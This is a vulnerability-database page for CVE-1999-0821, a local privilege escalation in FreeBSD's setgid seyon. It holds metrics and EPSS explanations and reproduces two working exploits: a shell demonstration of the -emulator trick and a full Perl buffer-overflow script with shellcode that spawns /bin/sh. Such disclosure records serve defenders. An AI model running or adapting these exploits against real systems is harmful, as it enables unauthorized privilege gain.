CVE-1999-0821 : Detail

CVE-1999-0821

0.04%V3
Local
2000-02-04
04h00 +00:00
2024-08-01
16h48 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

FreeBSD seyon allows local users to gain privileges by providing a malicious program in the -emulator argument.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.6 AV:L/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 19651

Publication date : 1999-11-30 23h00 +00:00
Author : Brock Tellier
EDB Verified : Yes

source: https://www.securityfocus.com/bid/838/info FreeBSD 3.3-RELEASE ships with Seyon, a communications program which is known to have several vulnerabilities which can allow for a malicious user to elevate priviliges. The vulnerability, however, is that seyon is still installed setgid dialer in FreeBSD. When seyon is exploited, a local user can grant him/herself priviliges which allow access to the communications devices or anything else accessable by the group dialer. One of the methods to exploit seyon is shown below: bash-2.03$ echo 'void main() { system("/usr/bin/id"); }' > id.c bash-2.03$ gcc -o id id.c bash-2.03$ seyon -emulator ./id uid=1000(xnec) gid=1000(xnec) egid=68(dialer) groups=68(dialer), 1000(xnec)
Exploit Database EDB-ID : 252

Publication date : 2001-01-14 23h00 +00:00
Author : teleh0r
EDB Verified : Yes

#!/usr/bin/perl ## (c) Copyright [email protected] / anno domani 2000 ## ## Seyon Exploit / Tested Version 2.1 rev. 4b i586-Linux ## Tested on: RedHat 4.0/5.1 ## ## Greets: scrippie, *@HWA, grazer, mixter, pr0ix, s\ ## http://www.digit-labs.org/ || http://teleh0r.cjb.net/ $shellcode = "\xeb\x1f". #/* jmp 0x1f */ "\x5e". #/* popl %esi */ "\x89\x76\x08". #/* movl %esi,0x8(%esi) */ "\x31\xc0". #/* xorl %eax,%eax */ "\x88\x46\x07". #/* movb %eax,0x7(%esi) */ "\x89\x46\x0c". #/* movl %eax,0xc(%esi) */ "\xb0\x0b". #/* movb $0xb,%al */ "\x89\xf3". #/* movl %esi,%ebx */ "\x8d\x4e\x08". #/* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c". #/* leal 0xc(%esi),%edx */ "\xcd\x80". #/* int $0x80 */ "\x31\xdb". #/* xorl %ebx,%ebx */ "\x89\xd8". #/* movl %ebx,%eax */ "\x40". #/* inc %eax */ "\xcd\x80". #/* int $0x80 */ "\xe8\xdc\xff\xff\xff". #/* call -0x24 */ "/bin/sh"; #/* .string \"/bin/sh\" */ $ret = 0xbfffef96; $egg = 500; $len = 208; $nop = 'A'; if (@ARGV == 1) { $offset = $ARGV[0]; } if (!($ENV{'DISPLAY'})) { die("Error: the shell variable DISPLAY is not set.\n"); } $buffer .= $nop; $new_ret = pack('l',($ret + $offset)); print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n"); sleep(1); for ($i = 0; $i < $len; $i += 4) { $buffer .= pack('l',($ret + $offset)); } for ($i = 0; $i < ($egg - length($shellcode)); $i++) { $buffer .= $nop; } $buffer .= $shellcode; # seyon uses X, so if there is no X server running, or you # are not allowed to connect to it, start X on your machine, # and using xhost, allow the target to connect to your server, # then: export DISPLAY=your-ip:0.0 - and execute the exploit. exec("/usr/X11R6/bin/seyon -noemulator \"$buffer\""); # milw0rm.com [2001-01-15]

Products Mentioned

Configuraton 0

Freebsd>>Freebsd >> Version 3.3

References

http://www.securityfocus.com/bid/838
Tags : vdb-entry, x_refsource_BID